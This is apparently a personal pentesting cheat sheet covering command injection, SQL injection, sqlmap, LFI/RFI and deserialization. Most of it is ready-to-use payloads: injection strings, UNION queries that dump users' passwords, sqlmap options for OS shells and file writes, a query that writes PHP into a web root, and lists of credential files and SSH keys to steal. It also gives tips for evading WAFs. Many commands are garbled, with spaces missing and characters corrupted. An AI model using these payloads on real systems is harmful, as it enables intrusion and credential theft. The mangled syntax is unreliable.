Some functions on a site may actually be running an OS command under the hood. Blind vs visible shows if there's a specific error or problem. We will want to read a world-readable file to determine if the injection was successful.
/etc/passwd# Linux world-readableC:\Windows\win.ini# Windows world-readableping-c4m4lwhere.org# Ping a server I own, determine if blind injection worked" & ping m4lwhere.org & rem # REM can be used as inline comments to comment out the rest of a Windows based injection
Character
Meaning
;
Execute more commands inline
|
Pipe output from prev command to next command
||
Will execute next command ONLY if previous was UNSUCCESSFUL
&
Send command to a background process
&&
Will execute next command ONLY if previous was SUCCESSFUL
>
Output to file and overwrite
>>
Output to file and append
<
Input from a file
#
Comment out the rest of the command, very useful if there's a lot of command left after the injection point
?
Single wildcard, can be used contiguously
[1-9]
Character set, finds anything in that array
{echo,hello,there}
Bash parameter expansion, will execute echo hello there
`id`
Command substitution, will execute before rest of command
$(id)
Command substitution
${IFS}
Internal Field Separator, used to add spaces w/o spaces
Tools
Programs such as commix make command injection very easy, just keep in mind that it may overwhelm the server.
SQLi
Super fun, get in the database and dump it. To test SQLi, we will put special characters into the input fields and observe errors returned by the application. Blind SQLi revolves around mostly types of sleep timing, concatenation, or some binary truths/falsehoods to be found.
'"')")'; -- "; --'); -- "); --'or1=1; --' or 1; --'or'a'='a # Quote balancing, expects that theres another "'" at the endSELECT @@version # Determine what the database information isSELECT name, sql FROM sqlite_master # For sqlite databases
Injection Points
Just like anything else, we want to FUZZ EVERYTHING. Generally, these injection points are located at the places below:
GET parameters
POST data parameters
HTTP cookies (Think ones that show an access level)
HTTP User Agent
Blind SQLi
Generally occurs when an application has a custom error when db errors occur, which makes identifying and exploiting SQLi more difficult. Concatenating strings for known good values can determine if the SQL database is directing interpreting the values we're providing.
m4l'/**/'where== m4l' 'where== m4lwhere'; # All of these values are the same according to SQL concatenation
Boolean testing can help determine blind SQLi vulnerabilities as well, place a known good value but put a đ¯ falsity with it, compare with a known good value and a đ¯ truity with it :)
m4lwhere' AND 1; -- # Test if value is true, if username is valid then goodm4lwhere'AND0; -- # Test if SQLi is being interpreted, known good username but always false 0
Verbs
Verbs
Meaning
SELECT
Retrieve content from a table
INSERT
Add content to a table
UPDATE
Modify data on a table
DELETE
Remove data from a table
DROP
Drop the WHOLE table
UNION
Combine data from one or more tables
Query Modifiers
Modifier
Meaning
WHERE
Needs to meet a certain conditional first
AND
Must meet both conditions
OR
Must meet at least one condition
LIMIT #1,#10
Limit rows returned to #10, starting from row #1
ORDER BY user
Sort by column user when presenting data
SQL Characters
Character
Meaning
', "
String delimiter
;
End of a SQL statement
--, #, /*
Comment characters
||, +, " "
String concatenation, add two strings together!
+, <, >, =
General arithmetic
()
Used to call subqueries or functions
%00
Null byte
Union Attacks
Used to identify and gather information from other tables or DBs to steal information. Must have the same number of columns in the original vulnerable SQL statement! We can ask politely to identify how many columns are returned, then work from there. https://portswigger.net/web-security/sql-injection/union-attacks
# Repeat until error! Error returned when too many columns are asked to be sorted.' ORDER by 1-- 'ORDER by2-- ' ORDER by 3--# Select NULL values to add to existing data returned'UNIONSELECTNULL--' UNION SELECT NULL,NULL--'UNIONSELECTNULL,NULL,NULL-- # Example Exploit, unions the intended results with additional info' UNION SELECT username, password FROM users--
Exploitation and Exfil
Use stacked queries to create new tables with data to be exfiled.
m4lwhere'; CREATE TABLE exfil(data varchar(1000));-- LOAD_FILE() # Used to read a file, MySQLBULK INSERT # Used to read a file, SQL Server# Potential XSS payloads stored in db and presented on site
Tools
There's a ton of useful tools, sqlmap is the most useful for exploitation imo. The mysql program is available on most hosts and is easy to connect to and manage.
# Built-in mysql toolsmysql -u root # Attempt toconnectto db asroot user, defaultisno passmysql -u root-p -h 10.10.10.1 # Connectto db at host 10.10.10.1asroot, prompts forpasswordmysql -u user1 -puser1pass # Connecttolocal db. NOTE no space after'-p'forpassword!mysqlshow -u theseus -piamkingtheseus # Again, NO SPACE AFTER-p FORPASSWORD# Inside the mysql shellshow databases; # List all dbs onserveruse wordpress; # Use a specific dbshow tables; # Show all tables for current dbdescribe wp_users; # Show columns for a specific tableselect*from wp_users; # Dump all records from a tablegroup_concat(user_login) # gather all records from the user_login column as one resultselect load_file('/etc/passwd'); # Read a localfileselect"<?php phpinfo() ?>"into outfile "/var/www/html/haha.php"; # Write a php fileto the web root
# SQLMap Usage and Examplessqlmapâu"http://website.target/login.jsp"âdata'user=m4lwhere&pass=badpass'# POST request with datasqlmap-u"http://172.30.78.35/view.php?id=1"# GET requestsqlmap -u "http://172.30.77.28/view.php?id=1&Search=Submit" -p id --cookie='PHPSESSID:sqdmeggl8nhp7kq63anc56hi77' # GET request with a PHP session cookie, also explicitly states to inject on the 'id' param
--user-agent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0' # Default user agent is sqlmap, not subtle!
--proxyhttp://127.0.0.1:8080# Proxies all connections thru burp or something --referer http://m4lwhere.org/signup.php # Adds the referer header to make requests less suspicious, some WAFs enforce referer for pages
sqlmap-u"http://172.30.78.35/view.php?id=1"--dbs# Lists all dbs on the hostsqlmap-u"http://172.30.78.35/view.php?id=1"--tables# Lists all tables inside all dbs on host# After an injeciton point is found, use sqlmap to explore the db--dbs# List all dbs--tables# List all tables, does not require a -D database, will list all tables from all dbs without it!--all# List all info about the database-Dwebsite--tables# List all tables from the 'website' db-Dwebsite-Tusers--columns# List all columns from the 'users' table in the 'website' db-Dwebsite-Tusers--dump# Dump the 'users' table :)--os-shell# Attempt to get an interactive shell--file-read/etc/passwd# Attempt to read a system file--file-write# Create a php webshell or something--reg-add# Add a windows reg key (think a powershell startup script)--reg-del# Deletes a windows reg key
LFI/RFI
LFI Files to Read
If we find we have LFI, we can try to find interesting files. Keep in mind some of these attacks will require the file to be encoded before they are served by PHP. Additionally, we can ask the site to load PHP we provide directly as well.
# Unix based files of interest/etc/passwd/etc/group/etc/shadow# Very unlikely but worth a shot/etc/os-release/etc/issue/etc/hosts/etc/motd/etc/mysql/my.cnf/proc/[0-9]*/fd/[0-9]* (first numberisthePID,secondisthefiledescriptor)/proc/self/environ/proc/version/proc/cmdline# Windows based files of interestC:\Windows\sysprep\sysprep.xmlC:\Windows\sysprep\sysprep.infC:\Windows\sysprep.infC:\Windows\Panther\Unattended.xmlC:\Windows\Panther\Unattend.xmlC:\Windows\Panther\Unattend\Unattend.xmlC:\Windows\Panther\Unattend\Unattended.xmlC:\Windows\System32\Sysprep\unattend.xmlC:\Windows\System32\Sysprep\unattended.xmlC:\unattend.txtC:\unattend.inf# Config files./.htacccess./.htpasswd./login.php# Find the login.php page and which page hosts the database credentialslogfiles# Potential Log poisoning if logs are rendered on the pagewp-config.php# Wordpress config, contains mysql creds# PHP Session Storagec:\Windows\Temp/tmp//var/lib/php5/var/lib/php/session# SSH Keys/home/user/.ssh/id_rsa/root/.ssh/id_rsa~/.ssh/id_dsa~/.ssh/id_ecdsa~/.ssh/id_ed25519~/.ssh/id_rsa/var/www/.ssh/authorized_keys # If a www-user account has write permissions, check home folder in /etc/passwd then attempt to drop a key
Gathering PHP Session Information
To find the PHP session file name, PHP, by default uses the following naming scheme, sess_<SESSION_ID> where we can find the SESSION_ID using the browser and verifying cookies sent from the server.
To find the session ID in the browser, you can open the developer tools (SHIFT+CTRL+I), then the Application tab. From the left menu, select Cookies and select the target website. There is a PHPSESSID and the value. In my case, the value is vc4567al6pq7usm2cufmilkm45. Therefore, the file will be as sess_vc4567al6pq7usm2cufmilkm45. Finally, we know it is stored in /tmp. Now we can use the LFI to call the session file.
A server/firewall might be blocking outbound HTTP for RFI, but could potentially allow outbound SMB to serve up the malicious page!
# Basic pythonpython3-mhttp.server8081http://127.0.0.1:8081/shell.php# SMB hosting[serve up smb hosting with impacket]\\127.0.0.1\shell.php
Deserialization Attacks
Injection attacks where data stored as bytes is later interpreted as instructions. issue with any object-oriented programming language. Serialized objects may be stored on the client side before they are transferred to the server to be added to the web app.
RCE from deserialization most often occurs from a JVM with a readObject() call, where an attacker supplies an object to be used.
Programs such as ysoserial.jar can be used to generate our code, creating by hand is a huge list of chained serialized objects.
